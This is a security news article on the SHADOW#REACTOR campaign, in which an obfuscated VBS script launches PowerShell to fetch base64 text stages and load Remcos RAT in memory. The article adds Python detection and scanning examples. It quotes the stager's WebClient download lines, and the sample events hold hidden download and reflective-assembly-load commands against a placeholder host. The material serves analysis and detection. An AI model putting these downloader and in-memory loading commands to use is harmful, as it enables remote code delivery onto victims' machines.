Multi-Stage Windows Malware Invokes PowerShell Downloader Using Text-based Payloads Using Remote Host


David kimber
January 13, 2026

Security researchers have identified SHADOW#REACTOR, a sophisticated multi-stage Windows malware campaign that signifies a notable evolution in remote access tool delivery mechanisms.

The campaign demonstrates how threat actors combine traditional scripting techniques with modern obfuscation methods to bypass security defenses.

The infection begins with an obfuscated Visual Basic Script that initiates a carefully orchestrated chain of execution stages, each designed to handle specific functions while minimizing detection.

The attack vector relies on user interaction, with victims unknowingly executing a malicious VBS file typically delivered through compromised web resources or social engineering lures.

Once executed, the script launches PowerShell processes that fetch fragmented payload pieces from remote infrastructure. These fragments remain encoded as plain text files, avoiding common binary detection signatures.

Process flow using Procmon (Source – Securonix)

The modular approach enables attackers to update individual stages independently without restructuring the entire chain.

The campaign showcases an unusual combination of living-off-the-land techniques and custom obfuscation layers.

Each execution stage passes control to the next through carefully managed handoffs, ensuring payload integrity across multiple downloads.

The attackers implemented redundancy checks and size validation mechanisms to guarantee successful payload reconstruction.

Securonix analysts identified the malware after the second stage revealed characteristic patterns in PowerShell command construction and base64 decoding operations.

The research team traced the infrastructure connections and matched the final payload signature to Remcos RAT, a commercially available remote administration tool repurposed for malicious use.

Win64.vbs (Source – Securonix)

The analysis revealed that Securonix analysts’ initial detection focused on unusual wscript.exe spawning multiple PowerShell instances with extensive inline commands—a distinctive behavioral pattern rarely seen in legitimate Windows operations.
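The behavioural pattern described above can be turned into a simple detection rule. The following is an added example (not Securonix's or the article's own code) that groups constructed Sysmon-style process-creation events and flags a wscript.exe parent that spawns two or more powershell.exe children or any child with a long inline command containing download or decode tokens; the thresholds and sample events are assumptions.

```python
from collections import defaultdict
from pathlib import PureWindowsPath

# Traits described for SHADOW#REACTOR: wscript.exe spawning several powershell.exe
# children whose inline commands download text stages and base64-decode them.
SUSPICIOUS_TOKENS = ("downloadstring", "frombase64string", "-enc", "reflection.assembly")
MIN_CHILDREN = 2        # assumed threshold: two or more PowerShell children per script host
LONG_CMDLINE = 400      # assumed threshold: inline command length in characters

def _basename(image):
    return PureWindowsPath(image).name.lower()

def score_event(ev):
    """Return the reasons a single powershell.exe event looks like a stager."""
    cmd = ev["cmdline"]
    reasons = []
    if len(cmd) >= LONG_CMDLINE:
        reasons.append("long inline command")
    hits = [t for t in SUSPICIOUS_TOKENS if t in cmd.lower()]
    if hits:
        reasons.append("tokens: " + ", ".join(hits))
    return reasons

def detect_wscript_powershell_chains(events):
    """Group powershell.exe children under each wscript.exe parent and report
    parents with MIN_CHILDREN or more children, or any child with stager traits."""
    parents = {e["pid"]: e for e in events if _basename(e["image"]) == "wscript.exe"}
    children = defaultdict(list)
    for e in events:
        if e["ppid"] in parents and _basename(e["image"]) == "powershell.exe":
            children[e["ppid"]].append(e)
    findings = []
    for ppid, kids in children.items():
        reasons = [f"{len(kids)} powershell children"] if len(kids) >= MIN_CHILDREN else []
        for k in kids:
            reasons += [f"pid {k['pid']}: {r}" for r in score_event(k)]
        if reasons:
            findings.append({"parent_pid": ppid, "script": parents[ppid]["cmdline"], "reasons": reasons})
    return findings

# Constructed sample events in Sysmon process-creation style (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Win64.vbs"'},
    {"pid": 4120, "ppid": 4100, "image": PS,
     "cmdline": "powershell.exe -w hidden -c $w=New-Object System.Net.WebClient;"
                "$d=$w.DownloadString('http://example.invalid/qpwoe64.txt');" + "$a+=1;" * 60},
    {"pid": 4131, "ppid": 4100, "image": PS,
     "cmdline": "powershell.exe -c [System.Reflection.Assembly]::Load([Convert]::FromBase64String($d))"},
    {"pid": 5200, "ppid": 3000, "image": PS, "cmdline": "powershell.exe Get-Process"},  # benign
]
```

Running `detect_wscript_powershell_chains(SAMPLE_EVENTS)` reports only the Win64.vbs host with its two children; the standalone Get-Process instance is ignored because its parent is not wscript.exe.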

The Text-Only Staging Pipeline: A Novel Delivery Approach

The defining characteristic of SHADOW#REACTOR lies in its unconventional text-based staging mechanism.

Rather than hosting binary payloads directly, attackers maintain encoded content in plain text files including qpwoe32.txt, qpwoe64.txt, teste32.txt, teste64.txt, and config.txt.

.NET Reactor Loader functions (Source – Securonix)

These files contain base64-encoded assembly code that appears as harmless text data to automated security systems performing routine scans.

The PowerShell stager implements a download loop with minimum size thresholds and timeout mechanisms.

If the retrieved file falls below expected sizes, the script automatically retries the download, ensuring incomplete transmissions don’t interrupt execution.

Decode function (Source – Securonix)

This resilience mechanism allows operators to manage payload updates without disrupting the entire infection chain.

Once validation succeeds, subsequent stages decode and reconstruct the content into functional .NET assemblies loaded entirely in memory using reflective loading techniques.

$webClient = New-Object System.Net.WebClient        # HTTP client used by the stager
$uwehj = $webClient.DownloadString($mlkia)         # fetch the text-encoded stage from the remote host
$uwehj | Out-File -FilePath $Iuytq -Encoding UTF8  # write it to disk as a plain text file

The text-only approach significantly complicates static detection, as security solutions typically flag binary executables rather than seemingly innocuous text files.
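Because a .NET assembly is a PE image, a text file carrying one in base64 still decodes to an MZ header whose e_lfanew field points at a PE signature, which gives a content-based check independent of the file extension. The following added example (not the article's or Securonix's code) scans text for long base64 runs that decode to a PE image; the minimum run and payload sizes are assumptions, and the sample PE is a constructed stand-in rather than a real assembly.

```python
import base64
import binascii
import re
import struct

# Base64 runs long enough to plausibly carry an assembly; short tokens are ignored.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{128,}={0,2}")
MIN_PAYLOAD = 256   # assumed minimum decoded size worth reporting (bytes)

def looks_like_pe(blob):
    """True if blob starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def find_embedded_pe(text):
    """Return (offset, decoded_size) for every base64 run in text that decodes
    to a PE image, which is what a .NET assembly looks like once decoded."""
    hits = []
    for m in B64_RUN.finditer(text):
        raw = m.group(0)
        try:
            blob = base64.b64decode(raw + b"=" * (-len(raw) % 4), validate=True)
        except (ValueError, binascii.Error):
            continue
        if len(blob) >= MIN_PAYLOAD and looks_like_pe(blob):
            hits.append((m.start(), len(blob)))
    return hits

def make_fake_pe(size=512):
    """Constructed stand-in for a tiny PE: MZ header, e_lfanew -> 0x80, PE signature."""
    img = bytearray(b"MZ" + b"\x90" * (size - 2))
    struct.pack_into("<I", img, 0x3C, 0x80)
    img[0x80:0x84] = b"PE\x00\x00"
    return bytes(img)

# Constructed inputs: a text stage wrapping the fake PE, and a benign text file
# that also contains a long base64 run (of letters, not a PE image).
SAMPLE_TEXT = b"config=1\n" + base64.b64encode(make_fake_pe()) + b"\nend\n"
BENIGN_TEXT = b"note=" + base64.b64encode(b"A" * 300) + b"\n"

if __name__ == "__main__":
    print(find_embedded_pe(SAMPLE_TEXT))   # one hit at offset 9, 512 decoded bytes
    print(find_embedded_pe(BENIGN_TEXT))   # no hits
```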

Combined with in-memory execution and process chain obfuscation, this staging pipeline represents a calculated effort to maintain persistence while evading endpoint detection and response systems designed to identify traditional malware delivery patterns.
